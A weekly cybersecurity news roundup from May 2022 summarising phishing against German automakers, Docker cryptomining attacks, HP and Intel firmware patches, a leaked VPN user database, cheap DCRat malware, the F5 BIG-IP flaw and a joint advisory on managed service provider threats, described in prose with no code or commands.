Cyber Pulse: Edition 184 | 13 May 2022

QA's practice director of Cyber Security, Richard Beck, rounds up this week's cyber security news.

German automotive companies targeted

A phishing campaign, ongoing for more than a year, has targeted German companies in the automotive industry, including car manufacturers and dealers. The attackers are trying to infect the systems of targeted users with password-stealing malware. Researchers from Check Point spotted the campaign and provided a technical report with details of their findings. The phishing campaign started around July 2021 and is still active.

The attackers registered various lookalike domains (called domain squatting) to use in their operation by cloning genuine sites of multiple organisations. The fake sites are used to spread phishing emails written in German and host malicious payloads. The goals of the campaign seem to be industrial espionage (or BE) attacks. These attacks are traced back to 14 targeted entities, all German organisations that had some connection to the auto-making industry. However, no specific name of any company is mentioned.

The infection starts with an email sent to certain targets, including an ISO disk image file that evades most internet security controls. As found in the samples, a phishing email pretended to contain an automobile transfer receipt sent to a targeted car dealer. This archive has an .HTA file that includes JavaScript or VBScript code execution using HTML smuggling. While the victim sees a decoy document, malicious code is running in the background to get malware payloads and execute them.

The attackers are reportedly using a vast infrastructure to impersonate existing German auto firms. The industry is suggested to stay vigilant against this ongoing campaign. To remain protected, organisations are recommended to use a strong password, deploy anti-phishing solutions, and provide training to employees on phishing threats.

Edited. Original Source: CheckPoint

Docker attacks linked to cryptominers

Researchers have spotted ongoing malicious campaigns in Docker honeypot targeting exposed Docker API port 2375. The attacks are linked to cryptominers and reverse shells on exposed servers. Uptycs Threat Research team detected the attacks that used base64-encoded commands to evade defense mechanisms. The team observed various types of attacks such as coinminer, shell script, and reverse shell.

The coinminer attack includes the use of various shell scripts to drop malicious components through the deployment of genuine Docker images on the servers exposed to the Docker API. Another type of cryptominer attack involves heavy obfuscation to evade static defenses. On executing a shell script, the XMRig miner gets downloaded from GitHub, and soon mining starts. The third type of attack uses reverse shell attacks where attackers execute a reverse shell on the exposed servers.

In Docker's honeypot, researchers observed large amounts of Kinsing-related attacks on the exposed servers. The malware includes various defense evasive mechanisms and commands with a rootkit to hide malicious activity.  The main goal of the attackers is to mine cryptocurrency on the exposed servers. The Kinsing shell script includes Docker-related commands to kill already running miner processes on the system. Docker containers are now becoming a fundamental aspect of application development. Without proper protections, these servers become exposed and targeted by attackers to launch attacks. Thus, it is recommended to monitor Docker-related threats often and leverage threat intelligence for better protection.

Edited. Original Source: UPTCYS

HP & Intel announce patches for critical vulnerabilities

HP announced the release of patches for two high-severity vulnerabilities that impact the UEFI firmware of more than 200 laptops, workstations, and other products. The two vulnerabilities are tracked as CVE-2021-3808 and CVE-2021-3809 and have a CVSS score of 8.8. HP has credited Nicholas Starke of Aruba Threat Labs and a researcher who uses the online moniker “yngweijw” for reporting these bugs but did not provide technical information on either of the flaws. However, the company did share a list of impacted products, which includes numerous business notebooks and desktop PCs, as well as desktop workstations, retail point-of-sale devices, and thin client PCs.

“Potential security vulnerabilities have been identified in the BIOS (UEFI Firmware) for certain HP PC products, which might allow arbitrary code execution. HP is releasing firmware updates to mitigate these potential vulnerabilities,” HP notes in its advisory.  While firmware updates are already available for most of the affected devices, a few of them have yet to receive patches. Users should read HP’s advisory for further details on impact and updates.

Meanwhile a total of nine documented high-severity issues impact multiple Intel Xeon, Pentium Silver, Rocket Lake Xeon, Core, and Core X series processors, the tech giant notes in an advisory. The most severe of these are four bugs that could lead to elevation of privilege via local access. Tracked as CVE-2021-0154, CVE-2021-0153, CVE-2021-33123, and CVE-2021-0190, the issues have a CVSS score of 8.2. The remaining five high-severity flaws detailed in the advisory could lead to escalation of privilege via local access as well, but have slightly lower CVSS scores. Intel’s advisory also documents two medium-severity issues.

Edited. Original Source: HP

VPN database of 21m user details leaked

In total, the database contains 10GB worth of data from companies like SuperVPN, GeckoVPN, and ChatVPN which is now available for free download on several different Telegram groups. On May 7th, 2022, a database containing the personal details and login credentials of 21 million users was leaked in a Telegram group, Hackread.com has learned. What’s noteworthy is that the dump also exposed the data of VPN users including popular VPNs like SuperVPN, GeckoVPN, and ChatVPN. The database was previously put up for sale on the Dark Web last year, but currently, it is available on Telegram for free. According to researchers at VPNMentor, the leaked records comprised 10GB of data and exposed 21 million unique records.

Further probe indicated that the leaked passwords were random, hashed, or salted without collision, therefore each was different and much more difficult to crack. A majority of the email IDs, about 99.5%, were Gmail accounts. But, researchers at vpnMentor believe that the dumped data is only a subset of the full dump. For now, it is unclear whether the data was stolen as a result of a data breach or it was obtained from some misconfigured server. Either way, the damage is done and users are now at risk of scams and prying eyes. The primary reason people choose to use VPNs is to ensure anonymity and privacy. This is why exposing the data of VPN users has far-reaching consequences since it is considered more valuable. In this case, the people who got their data exposed in the breach might become victims of blackmail, phishing scams, or identity theft since their full names and emails are leaked.

Edited. Original Source: VPNMentor

Very cheap remote access malware selling on forums

DCRat, an actively maintained malware, is available for sale at cheap prices on Russian hacking forums to professional and amateur cybercriminal groups. Researchers from BlackBerry claim that DCRat is the work of a lone threat actor. It is a surprisingly effective malicious tool for opening backdoors on targeted victims’ machines with less budget. It is written in DotNET by an individual codenamed ‘crystalcoder’ and ‘boldenis44.’ The RAT is a full-featured backdoor whose functionalities are further augmented by third-party plugins created by affiliates using DCRat Studio, an Integrated Development Environment (IDE).

Further, the author used JPHP with a Russian IDE named DevelNext to develop the RAT’s administration tool. Distribution vectors include Cobalt Strike Beacons and Prometheus TDS, a subscription-based crimeware-as-a-service used to spread different payloads. The price of the RAT starts from 500 RUB ($5) for a two-month license, 2,200 RUB ($21) for a year, and 4,200 RUB ($40) for a lifetime subscription. According to the posts on forums, these prices may be reduced during special promotions. DCRat’s code is being improved and maintained on a regular basis with availability at affordable prices. Thus, the RAT could be used by any novice cybercriminal.

Edited. Original Source: Blackberry

F5 BIG-IP RCE flaw

Researchers are warning against a critical RCE flaw in F5 BIG-IP, for which several exploits have been created by several researchers. Experts suggest applying the latest security updates at the earliest to prevent any attacks. A week ago, F5 disclosed a critical RCE, tracked as CVE-2022-1388, in BIG-IP networking devices. This vulnerability impacts the BIG-IP iControl REST authentication component and allows remote attackers to bypass authentication and run commands on the device with elevated privileges. The vulnerable devices are mostly used in the enterprise and may allow attackers to exploit the flaw for gaining initial access to networks and spreading laterally to other devices.

It has been reported that multiple researchers have created exploits for this new F5 BIG-IP vulnerability It took researchers two days to create the exploit and they expect that attackers may also reach the root cause easily.  The impact of this exploit could be significant as it allows threat actors to gain root access to the devices. At present, there are 2,500 devices exposed to the internet, making this a significant risk to organizations. F5 has already released BIG-IP security updates that admins can apply for certain firmware versions. The devices running 11.x and 12.x firmware versions will not receive security updates. Further, the firm has released three mitigations (1, 2, 3) for those who cannot upgrade their BIG-IP devices. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the recently disclosed F5 BIG-IP flaw to its Known Exploited Vulnerabilities Catalog following reports of active abuse in the wild.

Edited.  Original Source: Computing

Joint government advisory on managed service provider threats

The agencies responsible for cybersecurity from the United States, United Kingdom, Australia, and Canada have issued a second alert this week, stating that attacks on managed service providers (MSP) are expected to increase. The advisory states that if an attacker is able to compromise a service provider, then ransomware or espionage activity could be conducted throughout a provider's infrastructure and attack its customers.

"Whether the customer's network environment is on premises or externally hosted, threat actors can use a vulnerable MSP as an initial access vector to multiple victim networks, with globally cascading effects," the nations advised.

"NCSC-UK, ACSC, CCCS, CISA, NSA, and FBI expect malicious cyber actors -- including state-sponsored advanced persistent threat groups -- to step up their targeting of MSPs in their efforts to exploit provider-customer network trust relationships."

For the purposes of this advice, the MSP definition covers IaaS, PaaS, SaaS, process and support services, as well as cybersecurity services. In pretty obvious advice, the initial recommendation is to not get compromised in the first place. Beyond that, users are advised to adopt familiar set of advice such as: Improve monitoring and logging, update software, have backups, use multi-factor authentication, segregate internal networks, use a least privilege approach, and remove old user accounts. It is advised that users check contracts contain clauses to ensure MSPs have sufficient security controls in place.

"Customers should ensure that they have a thorough understanding of the security services their MSP is providing via the contractual arrangement and address any security requirements that fall outside the scope of the contract. Note: contracts should detail how and when MSPs notify the customer of an incident affecting the customer's environment," the advisory states. “MSPs, when negotiating the terms of a contract with their customer, should provide clear explanations of the services the customer is purchasing, services the customer is not purchasing, and all contingencies for incident response and recovery."

Edited. Original Source: CERT

Train with QA Cyber Security

Interested in learning more about cyber security? QA's Cyber Security practice offers training, labs, certifications and qualifications in a wide range of subjects, including attack and defence, data privacy, security operations, digital forensics and incident response, secure engineering, cyber governance, risk and compliance, cyber intelligence, and cloud security.

Contact us today.